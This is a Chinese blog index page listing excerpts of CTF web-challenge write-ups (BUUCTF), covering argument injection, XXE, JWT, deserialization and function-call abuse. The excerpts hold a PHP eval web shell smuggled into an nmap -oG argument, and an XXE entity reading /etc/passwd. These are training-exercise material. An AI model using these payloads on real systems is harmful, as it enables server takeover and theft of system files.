上一页 1 2 3 4 5 6 7 8 ··· 15 下一页
该文被密码保护。 阅读全文
posted @ 2020-06-04 22:58 山野村夫z1 阅读(0) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-06-02 21:10 山野村夫z1 阅读(5) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-05-31 21:24 山野村夫z1 阅读(0) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2020-05-31 10:52 山野村夫z1 阅读(0) 评论(0) 推荐(0) 编辑
摘要: 和[BUUCTF 2018]Online Tool类似,直接用里面的payload ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_POST["hack"]);?> -o 阅读全文
posted @ 2020-05-29 18:34 山野村夫z1 阅读(2321) 评论(0) 推荐(0) 编辑
摘要: 知识点 XXE探测内网 一如既往的登录框 抓包,添加外部注入实体,读取/etc/passwd <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/passwd"> ]> 阅读全文
posted @ 2020-05-27 22:08 山野村夫z1 阅读(1463) 评论(0) 推荐(0) 编辑
摘要: 知识点 jwt 登录界面 随便注册一个账户登录一下 看到有get flag,但是没有权限读取 F12查看源码,在source里看到app.js 没有什么思路,看了一下wp,得知要读取controllers/api.js 拿到源码 const crypto = require('crypto'); c 阅读全文
posted @ 2020-05-27 21:25 山野村夫z1 阅读(2005) 评论(0) 推荐(0) 编辑
摘要: 访问robots.txt得到提示 User-agent: * Disallow: /fAke_f1agggg.php 访问fAke_f1agggg.php,得到 flag{this_is_not_flag} 查看header头发现 /fl4g.php 访问/fl4g.php得到源码 <?php he 阅读全文
posted @ 2020-05-27 20:06 山野村夫z1 阅读(710) 评论(0) 推荐(0) 编辑
摘要: 知识点 pop链反序列化构造 题目源码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA 阅读全文
posted @ 2020-05-27 19:08 山野村夫z1 阅读(1252) 评论(0) 推荐(0) 编辑
摘要: 抓包看一下 date是一个函数,后面的p应该是它的参数 猜测使用了call_user_func(函数名,参数)函数 读取源码 func=file_get_contents&p=index.php <?php $disable_fun = array("exec","shell_exec","syst 阅读全文
posted @ 2020-05-27 10:58 山野村夫z1 阅读(1753) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 7 8 ··· 15 下一页